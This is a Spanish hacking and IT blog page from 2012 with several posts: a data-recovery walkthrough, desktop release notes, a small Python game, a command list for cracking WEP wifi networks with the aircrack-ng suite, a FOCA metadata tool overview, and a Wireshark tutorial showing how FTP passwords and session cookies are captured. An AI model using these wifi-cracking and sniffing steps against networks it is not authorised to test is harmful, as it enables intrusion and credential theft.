[H]ACKMUNDY - [L]ABS

Bienvenidos a [H]ACKMUNDY - [L]ABS....

Backtrack

Aprende Conceptos Basicos de Backtrack...

Informatica

Blog dedicado para Aprende y entender la Informatica......

Programacion

Aprende Nociones Basicas para iniciarte en la programacion...

Personalizacion

Aprende a Personalizar tu PC, blog........

jueves, 18 de octubre de 2012

Como Recuperar Datos Borrados con Easy Recovery Professional



Para el presente tutorial utilizaremos el Easy Recovery Pro 6.10 para recuperar archivos borrados por ya error o después de formatear el computador, hay q tener en cuenta que mientras menos usemos el disco duro más probabilidades tendremos de recuperar los archivos.

Bajamos Aqui!!! el programa y lo instalamos.

Una vez instalado abrimos el programa y nos encontraremos con la siguiente ventana en la que seleccionaremos la opción Recuperación de datos.



El siguiente paso es elegir lo que queremos hacer, de todas las opciones seleccionamos en Recuperación de archivos eliminados.


Posteriormente nos abrirá  el siguiente cuadro de dialogo que nos indica que necesitaremos otra unidad (otro disco duro, un pendrive o una unidad externa) para recuperar los datos, clikeamos en OK

En la siguiente ventana elegiremos la unidad donde estaban los archivos eliminados y opcionalmente elegiremos la extensión (aunque no es necesario) también hay que asegurarse de marcar la casilla Exploración completa porque así puede recuperar mas archivos

Ahora saldrá la siguiente ventana (no tenemos que hacer nada) solo esperamos a que termine el proceso de búsqueda de los archivos que podemos recuperar.

Una vez terminado el proceso nos muestra la siguiente ventana donde seleccionaremos los archivos que queremos recuperar.

Y ahora elegimos la unidad de destino (que tiene que ser distinta de la unidad en que se encuentran los archivos que deseamos recuperar) marcando la casilla Recuperación en unidad local y  clikeando en examinar.


Elegimos el destino y aceptamos


La siguiente ventana tampoco requiere ninguna acción nomas esperas.

Y el programa finalizara su trabajo con un informe.


Pulsamos en Listo, cerramos el programa y nos vamos al destino donde hemos decidido guardar los archivos recuperados y allí tendremos los archivos que recuperamos.


Espero les sea de mucha utilidad como a mí a si me a ayudado salvado varias veces de perder mi información por completo.Espero les sea de mucha utilidad como a mí a si me a ayudado salvado varias veces de perder mi información por completo.

Qui les dejo un video donde esplica cada unaa de las opciones de  Easy Recovery Professional
Aca les dejo un VideoTutorial Para que lo entiendan Mejor

Disponible Nemo 1.0.4 y Cinnamon 1.6.2


Desde el blog de Cinnamon nos llegan las novedades que incluyen el Gestor de Ficheros de Linux Mint, un fork de Nautilus llamado Nemo y del popular Shell para Gnome: Cinnamon.
Los cambios son los siguientes:

Nemo 1.0.4:
  • Corregido el atajo de teclado Alt + Flechas
  • Se añade una extensión para establecer Wallpapers desde Nemo.
  • Abrir-como-root ahora llama a Nemo en sí mismo (en oposición a xdg-open)
  • Nemo ahora inicia automáticamente si org.gnome.desktop.background desktop-icons están en verdadero o falso
Cinnamon 1.6.2:
  • Nuevo “enlaces de teclado” en la página configuración de Cinnamon
  • Se corrige la alineación fija en las ventanas emergentes de notificación
  • Prevenir no-gtk-systray-iconos de desaparecer en remostrado
  • Applet de lista de Ventana: Corregido regresión a cerrar todo y cerrar otros.
  • No esconde Spotify desde la bandeja del sistema
  • Traducciones actualizadas
  • altTab: Corregido el tamaño de las miniaturas.
  • Corregido conky/mintUpload en Alt-tab
  • Alt-tab: Iconos + Miniaturas como opción predeterminada
  • Notificaciones habilitadas y applets de ajustes por defecto
  • Ignora la configuración de GNOME para gestionar el escritorio (Nemo siempre debe empezar)
Estas y otras novedades las pueden encontrar en este enlace.

jueves, 4 de octubre de 2012

Juego Basico en Python 2.7




Estando estudiando python y practicando Hoy les presento mi primer juego basico espero que les guste...
es para linux pero si desean en windows solo quitan la linea #!/usr/bin/env python y debes de "clear" le ponen "cls"...

#!/usr/bin/env python
#encoding: utf-8

import random
import time
import os

  

class game:
    m_archivo=open("bienvenido.txt","r")
    a=m_archivo.readline()
    print a
    while a != "":
        a= m_archivo.readline()
        print a
    print "BIENVENIDOS A GAMES BY HACKMUNDY"
    def juego1(self,nombre):
        self.nombre=nombre
        print "Bienvenido al Juego 1"
        time.sleep(1)
        print "Suerte la Nesecitaras Xd...."
        time.sleep(2)
        print " "
        n_al=random.randrange(1,101)
        q="si"
        con=0
       
        while (q == "Si") or (q=="si"):
            os.system("clear")
            print "ADIVINA QUE NUMERO PIENSO ES UN NUMERO ENTRE EL RANGO 1 AL 100..."
            print ""
            num=int(raw_input("Su Intento: "))
            if num == n_al:
                print " "
                print "Enhorabuena Acertastes, Bien echo"
                print "Felicidades", self.nombre
                print "Numero de intentos: ",con
                print ""
                q=raw_input("Quieres continuar: ")
                if q=="no" or q=="No":
                    print ""
                    print "\a"
                    print "Adios ",self.nombre,"Suerte para la proxima..."
                    print "Numero de Intentos: ",con
                    print "Saliendo del juego...."
                    time.sleep(2)
                    os.system("clear")
               
                self.__init__()
            else:
                print ""
                print "\a"
                print "Mala suerte perdistes, intentalo de nuevo.."
                print "Tranquilo en la proxima ganaras ",self.nombre
               
                if num > n_al:
                    print "Escribe un numero mas chico ", self.nombre
                elif num < n_al:
                    print "Escribe un numero mas Grande ",self.nombre
                    print ""
                i=raw_input("")
            con=con+1   
           
               
    def juego2(self,nombre):
        self.nombre=nombre
        print " "
        print "Bienvenido al Juego 2"
        time.sleep(1)
        print "Suerte la Nesecitaras Xd...."
        time.sleep(2)
        print " "
        print "Elije tu favorito: "
        print "1.- Color en palabras"
        print "2.- Cero X"
        print " "
       
       
        hq="si"
        con=0
       
        time.sleep(1)
        ele=int(raw_input("Elije cual quieres: "))
        if ele == 1:  #Comenzando el Juego 2 (color)
            print "Bienvenido Has elejido el Color en Palabras..."
            print "\a"
            print ""
            difi=3
            con=0
            while (hq=="si") or (hq=="Si"):
                tupla=("Rojo","Verde","Amarillo")
                seq=[]
                inte=[]
               
               
                for x in range(difi):
                    r=random.randrange(3)
                    seq.append(tupla[r])
                    os.system("clear")
               
                for s in seq:
                    print s,"\a"
                    time.sleep(1)
                    os.system("clear")
                   
                for e in range(difi):
                    print "Introdusca..."
                    print "1.- Rojo"
                    print "2.- Verde"
                    print "3.- Amarillo"
                    print ""
                    su=int(raw_input("?: "))
                    if su > 4:
                        print "Elijistes un numero equivocado...."
                        print "Reiniciando Juego"
                        time.sleep(2)
                        os.system("clear")
                        self.juego2(self.nombre)
                                           
                    inte.append(tupla[su-1])
                    os.system("clear")
                con=con+1
                if seq==inte:
                    print " "
                    print "Enhorabuena Acertastes, Bien echo"
                    print "Felicidades", self.nombre
                    print "Numero de intentos: ",con
                    print "Nivel de dificultad ", difi-2
                    print ""
                    print "Aumentando Dificultad....."
                    difi=difi+1
                    time.sleep(1)
                   
                else:
                    print ""
                    print "\a"
                    print "Mala suerte perdistes, intentalo de nuevo.."
                    print "Tranquilo en la proxima ganaras ",self.nombre
                    print "Nivel de dificultad " ,difi-2
                    print ""
                    print "Disminuyendo Dificultad....."
                    difi=difi-1
                    time.sleep(1)
                   
               
                hq=raw_input("Quiere continuar: ")
               
                if hq=="no" or hq=="No":
                    print ""
                    print "\a"
                    print "Adios ",self.nombre,"Suerte para la proxima..."
                    print "Numero de Intentos: ",con
                    print "Nivel de dificultad " ,difi-2
                    print "Saliendo del juego...."
                    time.sleep(2)
                    os.system("clear")
                   
               
                    self.__init__()  
              
        elif ele==2:#Comenzando eleccion 2
           
           
            di=3
            while (hq=="si") or (hq=="Si"):
                tupla1=("x,0,0","0,x,0","0,0,x")  
                seq1=[]      
                inte1=[]
                for a in range(di):
                    h=random.randrange(3)
                    seq1.append(tupla1[h])
                    os.system("clear")
                   
                   
                for g in seq1:
                    print g, "\a"
                    time.sleep(1)
                    os.system("clear")
                   
                for pon in range(di):
                    print "Introdusca...."
                    print "1.- x,0,0"
                    print "2.- 0,x,0"
                    print "3.- 0,0,x"
                    ten=int(raw_input("?: "))
                    if su > 4:
                        print "Elijistes un numero equivocado...."
                        print "Reiniciando Juego"
                        time.sleep(2)
                        os.system("cls")
                        self.juego2(self.nombre)
                    inte1.append(tupla1[ten-1])
                    os.system("clear")
                con=con+1
                if seq1==inte1:
                    print " "
                    print "Enhorabuena Acertastes, Bien echo"
                    print "Felicidades", self.nombre
                    print "Numero de intentos: ",con
                    print "Nivel de dificultad ", di - 2
                    print ""
                    print "Aumentando Dificultad....."
                    di=di+1
                    time.sleep(1)
                   
                else:
                    print ""
                    print "\a"
                    print "Mala suerte perdistes, intentalo de nuevo.."
                    print "Tranquilo en la proxima ganaras ",self.nombre
                    print "Nivel de dificultad ", di-2
                    print ""
                    print "Disminuyendo Dificultad....."
                    di=di+1
                    time.sleep(1)
                   
                hq=raw_input("Quiere continuar: ")
                if hq=="no" or hq=="No":
                    print ""
                    print "\a"
                    print "Adios ",self.nombre,"Suerte para la proxima..."
                    print "Numero de Intentos: ",con
                    print "Nivel de dificultad ",di-2
                    print "Saliendo del juego...."
                    time.sleep(2)
                    os.system("clear")
               
                    self.__init__()  
                       
           
           
        else:
           
            print "\a \a \a"
            print "Has puesto un numero mal .... Elije otro"
            self.juego2(self.nombre)

           
               
           
   
    def __init__(self):
        print " "
        time.sleep(1)
        print "Elije tu juego...."
        print " "
        print "1.- Adivina el Numero"
        print "2.- Juego de Memoria"
        print "3.- Salir"
        print " "
        nom=raw_input("Cual es tu Nombre: ")
        cual=int(raw_input("Cual juego quiere jugar: "))
        if cual == 1:
            print "\a"
            os.system("clear")
            self.juego1(nom)
        elif cual ==2:
            print "\a"
            os.system("clear")
            self.juego2(nom)
        elif cual == 3:
            print "\a"
            print "Gracias por Utilizar el Software...."
            print "Cualquier fallo, me podrias ayudr diciendomelo...."
            print "Hasta la proxima ",nom
            time.sleep(2)
           
        else:
            print "\a \a \a"
            print "Has puesto un numero mal .... Elije otro"
            self.__init__()
           
           
game()

Resumen de los Comandos utilizados para Hackear redes wifi...



Los programas necesarios, los encontrarán aquí

http://www.backtrack-linux.org

Mientras que los comandos utilizados, son estos:

Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]

Espero que le sirva saludos...

miércoles, 3 de octubre de 2012

Herramienta para análisis de Meta Datos [FOCA]

FOCA, Es increíble pensar que llevo bastante tiempo utilizando la FOCA y nunca le había dedicado un artículo a este animal, a pesar de haber publicado varias charlas de Chema Alonso donde daba a conocer su mascota.
FOCA1 FOCA   Herramienta para análisis de Meta Datos

¿Que es la FOCA?

FOCA (Llamado así en honor a Francisco OCA, aunque luego buscaran las siglas “Fingerprinting Organizations with Collected Archives”) es una herramienta para encontrar Metadatos e información oculta en documentos de Microsoft Office, Open Office y documentos PDF/PS/EPS, extraer todos los datos de ellos exprimiendo los ficheros al máximo y una vez extraídos cruzar toda esta información para obtener datos relevantes de una empresa.

¿Que funciones tiene la FOCA?

La foca hace Google y Bing Hacking para descubrir los archivos ofimáticos que tiene un dominio, los descarga masivamente, les extrae los metadatos, organiza los datos y nos muestra la siguiente información:
  • Nombres de usuarios del sistema
  • Rutas de archivos
  • Versión del Software utilizado
  • Correos electrónicos encontrados
  • Fechas de Creación, Modificación e Impresión de los documentos.
  • Sistema operativo desde donde crearon el documento
  • Nombre de las impresoras utilizadas
  • Permite descubrir subdominios y mapear la red de la organización
  • Nombres e IPs descubiertos en Metadatos
  • Búsqueda de nombres de dominio en Web: Google o Bing [Interfaz web o API]
  • Búsqueda de registros Well-Known en servidor DNS
  • Búsqueda de nombres comunes en servidor DNS
  • Búsqueda de IPs con resolución DNS
  • Búsqueda de nombres de dominio con BingSearch ip
  • Búsqueda de nombres con PTR Scanning del segmento de red con DNS interno
  • Transferencia de Zonas
  • Detección automática de DNS Cache
  • Vista de Roles
  • Filtro de criticidad en el log
  • Entre otras muchas cosas…
Ahora en la versión 3.0 los chicos de Informatica64 han dado un nuevo aire a la herramienta, cambiando completamente su interface, añadiendo nuevas funcionalidades, en fin… les dejo el listado de cambios, con los respectivos enlaces para que analices cada uno en profundidad:
  • Re-styling del interfaz.
  • Panel de tareas multi-hilo.
  • Búsqueda de puertos de squid proxy.
  • Búsqueda de registros de servicio en DNS.
  • Búsqueda de políticas anti-spam del dominio [SPF, DKIM, Domainkey]
  • Búsqueda de ficheros ICA y RDP: Usuarios, software en ellos y adición rol de RemoteApp.
  • Análisis de .DS_Store
  • Análisis de Robots.txt
  • Integración de Shodan y Robtex en el algoritmo
  • Análisis de Leaks [Solo en versión PRO]
  • Análisis de errores de aplicación
  • Ampliación de tecnologías
La foca es especialmente útil, en la tarea previa a un pen-test, donde debemos recolectar toda la información posible sobre el objetivo para que nuestra tarea se realice de la mejor forma.
Aquí podemos ver a Chema mostrando su FOCA, durante su charla en el VI Congreso Latinoamericano de Respuesta a Incidentes de Seguridad (Colaris), realizado en Perú.
O este pequeño manual básico de instalación y uso creado por cruz4d3r para la comunidad en una versión anterior de la foca (pero aún vigente).

Descargar la FOCA 3

Más Información:
Pagina Oficial de la FOCA
Versión Online de la FOCA
La Página del Maligno, donde habla siempre de su FOCA

Sniffing con Wireshark

Introducción.

Wireshark es un analizador de paquetes de red, comúnmente llamado sniffer.  Es utilizado por administradores de redes para ver todo el tráfico que está pasando en un momento específico.
Una de las ventajas que tiene, es que es open source y multiplataforma.   Wireshark ofrece distintos tipos de filtros para leer los paquetes. Captura a demás cookies y passwords que veremos a continuación en este paper.
Para instalar wireshark simplemente hay que ir a su página oficial y descargarlo.
http://www.wireshark.org/download.html
Desde linux, se puede descargar desde la consola.

Sudo apt-get install wireshark

Partes de Wireshark


Enumere las partes más importantes del Wireshark para describirlas por separado.
1 – Muestra un listado de las interfaces disponibles que podemos poner a la escucha de paquetes.
2 – Permite configurar algunos parámetros de nuestra interface
3 – El filtro permite filtras paquetes separándolos por IP, protocolos, etc
4 – Listado de paquetes. Muestra un resumen de los paquetes capturados, presionando con el otro botón del mouse se listaran opciones disponibles para manejarlos a gusto.
5 – Panel de vista en Árbol. Muestra el paquete seleccionado con mayor detalle.
6 – Panel de detalle  de los datos. Muestra los datos del panel superior en formato hexadecimal y ascii

También podemos ver en el menú superior las siguientes opciones:

File: Contiene las funciones para manipular archivos y para cerrar la aplicación Wireshark.
Edit: Este se puede aplicar funciones a los paquetes, por ejemplo, buscar un paquetes especifico, aplicar una marca al paquete y configurar la interfaz de usuario.
View: Permite configurar el despliegue del paquete capturado.
Go: Desde acá podemos ir a un paquete especifico, volver atrás, adelante, etc.
Capture: Para iniciar y detener la captura de paquetes.
Analyze: Desde analyze podemos manipular los filtros, habilitar o deshabilitar protocolos, flujos de paquetes, etc.
Statistics: Podemos definir u obtener las estadísticas del trafico capturado.
Telephony: Trae herramientas para telefonía.
Tools: Opciones para el firewall
Internal: Parámetros internos de Wireshark
Help: Menú de ayuda.

Primeros pasos con Wireshark

Una vez instalado, lo abrimos y presionamos sobre el icono marcado en rojo en la imagen


Esto nos permitirá seleccionar nuestra tarjeta de red que pondremos a la escucha de paquetes.

Para saber que tarjeta poner a la escucha, debemos observar cual es la que recibe paquetes.
Se puede observar en la imagen que en mi caso es la wlan0. Una vez identificada, damos en Start para comenzar.
Automáticamente el programa comenzara a capturar paquetes de todos los hosts conectados a la red.
Ahora navegare un poco con mis ordenadores por internet para ver que podemos capturar.

Les mostrare un ejemplo de cómo se manifestó mi wireshark cuando hice un apt-get install en la consola de Linux

Ahí podemos ver de que ip a que ip se mueven los paquetes y porque protocolo. A demás de esto podemos ver el contenido del paquete que lo veremos más adelante en este mismo paper.
Si observamos la imagen, hay una caja de texto llamada Filter.

Esa caja de texto, como bien dice su nombre, permite filtrar paquetes. Y ahora veremos algunos de los filtros que posee Wireshark para que podamos usar este sniffer de una forma más eficiente.
En el filtro se pueden usar operadores lógicos como los siguientes:

1
2
3
4
5
6
== (Igual que)
> (Mayor que)
< (Menor que)
!= (Distinto que)
>= (Mayor o igual que)
<= (Menor o igual que)
Basándome en el paper de Datasecurity, les dejo a continuación los parámetros más usados en este sniffer

Filtros por IP

[En todos los ejemplos, reemplazar 0.0.0.0 por la ip a filtrar]

1
2
3
ip.addr = = 0.0.0.0
ip.addr = = 0.0.0.0 && ip.addr = = 0.0.0.0 (Para filtrar más de una IP )
ip.addr = = 0.0.0.0 || ip.addr = = 0.0.0.0 (Para filtrar una IP de cualquiera de las dos)
Para filtrar paquetes de la fuente en direcciones IPv4 especificas:

1
2
3
ip.src == 0.0.0.0
ip.src == 0.0.0.0 && ip.src == 0.0.0.0 (Para filtrar más de una IP )
ip.src == 0.0.0.0 || ip.src == 0.0.0.0 (Para filtrar una IP de cualquiera de las dos)
Para filtrar paquetes del destino en direcciones IPv4 especificas:

1
2
3
ip.dst == 0.0.0.0
ip.dst == 0.0.0.0 && ip.dst == 0.0.0.0 (Para filtrar más de una IP )
ip.dst == 0.0.0.0 || ip.dst == 0.0.0.0 (Para filtrar una IP de cualquiera de las dos)
Nota: Para direcciones IP v6 utilice: ipv6.addr, ipv6.src, ipv6.dst, etc.

Para filtrar paquetes del protocolo ARP entre:

1
2
3
4
5
6
7
arp.src.proto (dirección del protocolo de la fuente)
arp.src.hw (dirección hardware de la fuente)
arp.dst.hw (dirección hardware del destino)
arp.src.hw_mac (dirección MAC de la fuente)
arp.dst.hw_mac (dirección MAC del destino)
arp.src.proto_ipv4 (dirección IPv4 de la fuente )
arp.dst.proto_ipv4 (dirección IPv4 del destino)
Para filtrar paquetes del protocolo Ethernet:

1
2
3
eth.dst == ff:ff:ff:ff:ff:ff (dirección MAC)
eth.src == ff:ff:ff:ff:ff:ff (dirección MAC)
eth.addr == ff:ff:ff:ff:ff:ff (dirección MAC)
Veremos un ejemplo con uno de los filtros: ip.addr == 192.168.1.37

En este caso me debería mostrar los paquetes correspondientes a la ip 192.168.1.37
Se puede ver en verde también 192.168.1.1 y esto es porque hace petición al router.

Filtro por protocolo

Como vimos hasta ahora, este filtro es muy poderoso, pero se darán cuenta de su potencial ahora que filtraremos por protocolo.
Algunos de los filtros son estos: tcp, http, pop, dns, arp, ssl, etc.
Con un Sniffer podemos obtener datos muy importantes. Desde cookies hasta usuarios y contraseñas. A modo ejemplo, abriré un FTP y veremos lo que hace nuestro Wireshark:

Como se puede ver, solo filtre el protocolo FTP. Y tambien notaremos que sacó mi user y pass del FTP.
Veremos ahora otros de los protocolos que suele capturar. En este caso hare un ping a mi blog www.antrax-labs.org

La imagen muestra el protocolo DNS e ICMP. Que si los añadimos en la caja de texto de filtro, nos los filtrara.
Aquí tenemos filtro por DNS

Cabe aclarar que cada protocolo tiene un color diferente (que puede modificarse a gusto) para resaltarlos y distinguirlos con mayor facilidad.

Otros filtros

Veremos ahora otros filtros de gran utilidad, como este otro que nos permite filtrar por dominio o host

1
http.host == “DOMINIO”
Acá lo que hice fue poner la url de facebook y robo mi cookie. Veremos ahora un ejemplo con otra web, pero filtrando nada más que el protocolo TCP:

Se puede ver de qué ip privada navego hacia que ip publica. En este caso, la ip pública es la del foro infiernohacker y abajo muestra la url de referencia.

Otras opciones de Wireshark

Veremos ahora algo que se llama Go to Packet o ir al paquete. Para usar esta opción basta con ir a GO >> Go to Packet en el menú de la barra superior.
Permite ir a un número de paquete que especifiquemos en el cuadro de texto.

Otras de las opciones muy útiles que tiene Wireshark es la de poder mostrar en formato ascii la lectura de los paquetes capturados para poder así facilitar su entendimiento
Para ir a esta opción colocamos en el filtro HTTP y solo basta con clickear con el botón secundario del mouse y seleccionar Follow TCP Stream

Como se puede ver, se ve mucho más entendible el código y permite tambien pasarlo a Hexadecimal, C Array etc.


Este articulo Fue sacado de otro blog que recomiendo mucho en la seccion de mis sites...
Fuente Antraxlabs

martes, 2 de octubre de 2012

Vulnerabilidades en Windows XP


Bueno pues como dice el titulo, me puse ha redactar un tutorial que explca unos métodos poco comunes de como explotar windows xp, talvez muchos ya conocen estas vulnerabilidades, de todas formas para los que no la conocían aqui les dejo otro de mis tutoriales bien explciados de como aprovecharnos de las vulnerabilidades que nos ofrece este sistema operativo.

link de descarga directa: Aqui

Web hosting